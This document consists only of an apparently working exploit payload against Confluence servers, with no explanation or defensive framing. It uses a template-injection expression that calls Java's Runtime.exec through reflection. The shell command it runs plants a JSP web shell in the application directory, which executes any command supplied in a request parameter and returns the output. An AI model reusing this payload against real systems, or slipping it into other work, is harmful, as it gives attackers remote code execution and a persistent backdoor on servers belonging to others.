$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('/bin/sh -c $@|sh . echo /bin/echo "<%=new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter(Character.toString ((char) 48))).getInputStream()).useDelimiter(Character.toString ((char) 92) + Character.toString ((char) 65)).next()%>" > $(echo $CATALINA_PID | sed s_work/catalina.pid_confluence_)/c290dd368683e9521bedc83713ff3ce9.jsp && sleep 15').waitFor()
